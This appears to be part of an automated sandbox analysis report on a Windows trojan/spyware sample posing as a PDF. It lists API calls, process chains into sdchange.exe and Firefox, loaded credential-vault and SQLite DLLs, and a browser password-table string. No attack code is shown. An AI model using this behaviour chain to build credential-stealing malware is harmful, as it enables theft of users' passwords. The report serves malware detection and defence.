            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D72C60 NtCreateKey,4_2_32D72C60
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D72C00 NtQueryInformationProcess,4_2_32D72C00
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D72DD0 NtDelayExecution,4_2_32D72DD0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D72DB0 NtEnumerateKey,4_2_32D72DB0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D73D70 NtOpenThread,4_2_32D73D70
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D73D10 NtOpenProcessToken,4_2_32D73D10
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D72D10 NtMapViewOfSection,4_2_32D72D10
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D72D00 NtSetInformationFile,4_2_32D72D00
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D72D30 NtUnmapViewOfSection,4_2_32D72D30
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403359
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeFile created: C:\Windows\resources\0809Jump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeFile created: C:\Windows\resources\0809\mysterist.iniJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 0_2_00404C680_2_00404C68
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 0_2_0040698E0_2_0040698E
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 0_2_6FBC1B630_2_6FBC1B63
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D5B2C04_2_32D5B2C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D5D2F04_2_32D5D2F0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DE12ED4_2_32DE12ED
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D452A04_2_32D452A0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DE02744_2_32DE0274
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32E003E64_2_32E003E6
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D4E3F04_2_32D4E3F0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D8739A4_2_32D8739A
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DFA3524_2_32DFA352
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2D34C4_2_32D2D34C
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF132D4_2_32DF132D
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DEF0CC4_2_32DEF0CC
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D470C04_2_32D470C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF70E94_2_32DF70E9
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DFF0E04_2_32DFF0E0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF81CC4_2_32DF81CC
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32E001AA4_2_32E001AA
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D4B1B04_2_32D4B1B0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32E0B16B4_2_32E0B16B
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F1724_2_32D2F172
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D7516C4_2_32D7516C
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DDA1184_2_32DDA118
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D301004_2_32D30100
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF16CC4_2_32DF16CC
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D5C6E04_2_32D5C6E0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D3C7C04_2_32D3C7C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DFF7B04_2_32DFF7B0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D647504_2_32D64750
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D407704_2_32D40770
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DEE4F64_2_32DEE4F6
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF24464_2_32DF2446
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D314604_2_32D31460
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DFF43F4_2_32DFF43F
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DDD5B04_2_32DDD5B0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32E005914_2_32E00591
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF75714_2_32DF7571
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D405354_2_32D40535
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DEDAC64_2_32DEDAC6
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D3EA804_2_32D3EA80
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DDDAAC4_2_32DDDAAC
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D85AA04_2_32D85AA0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DFFA494_2_32DFFA49
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF7A464_2_32DF7A46
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB3A6C4_2_32DB3A6C
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF6BD74_2_32DF6BD7
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D7DBF94_2_32D7DBF9
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D5FB804_2_32D5FB80
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DFAB404_2_32DFAB40
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DFFB764_2_32DFFB76
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D6E8F04_2_32D6E8F0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D438E04_2_32D438E0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D268B84_2_32D268B8
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D428404_2_32D42840
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D4A8404_2_32D4A840
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32E0A9A64_2_32E0A9A6
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D429A04_2_32D429A0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D499504_2_32D49950
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D5B9504_2_32D5B950
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D569624_2_32D56962
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DFEEDB4_2_32DFEEDB
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D52E904_2_32D52E90
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DFCE934_2_32DFCE93
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D49EB04_2_32D49EB0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D40E594_2_32D40E59
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DFEE264_2_32DFEE26
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D32FC84_2_32D32FC8
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D4CFE04_2_32D4CFE0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D41F924_2_32D41F92
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DFFFB14_2_32DFFFB1
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB4F404_2_32DB4F40
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DFFF094_2_32DFFF09
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D60F304_2_32D60F30
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D82F284_2_32D82F28
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D30CF24_2_32D30CF2
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DFFCF24_2_32DFFCF2
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DE0CB54_2_32DE0CB5
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D40C004_2_32D40C00
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB9C324_2_32DB9C32
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D5FDC04_2_32D5FDC0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D3ADE04_2_32D3ADE0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D58DBF4_2_32D58DBF
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF1D5A4_2_32DF1D5A
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D43D404_2_32D43D40
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF7D734_2_32DF7D73
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D4AD004_2_32D4AD00
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: String function: 32DAEA12 appears 84 times
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: String function: 32D2B970 appears 266 times
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: String function: 32D87E54 appears 87 times
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: String function: 32D75130 appears 36 times
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: String function: 32DBF290 appears 105 times
            Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2567118439.0000000002DB7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesdchange.exej% vs S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe
            Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000002.2633223888.0000000032FD1000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe
            Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2506460914.0000000032C84000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe
            Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2504045336.0000000032AC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe
            Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2567064883.0000000002DAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesdchange.exej% vs S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe
            Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/10@3/3
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403359
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 0_2_004046EC GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046EC
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 0_2_00402104 CoCreateInstance,0_2_00402104
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsn8FD7.tmpJump to behavior
            Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: sdchange.exe, 00000007.00000003.2810505866.0000000000905000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000007.00000003.2806166818.0000000000905000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000007.00000002.2936326745.0000000000905000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeVirustotal: Detection: 15%
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeFile read: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe "C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe"
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeProcess created: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe "C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe"
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exeProcess created: C:\Windows\SysWOW64\sdchange.exe "C:\Windows\SysWOW64\sdchange.exe"
            Source: C:\Windows\SysWOW64\sdchange.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeProcess created: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe "C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe"Jump to behavior
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exeProcess created: C:\Windows\SysWOW64\sdchange.exe "C:\Windows\SysWOW64\sdchange.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: cryptbase.dllJump to behavior
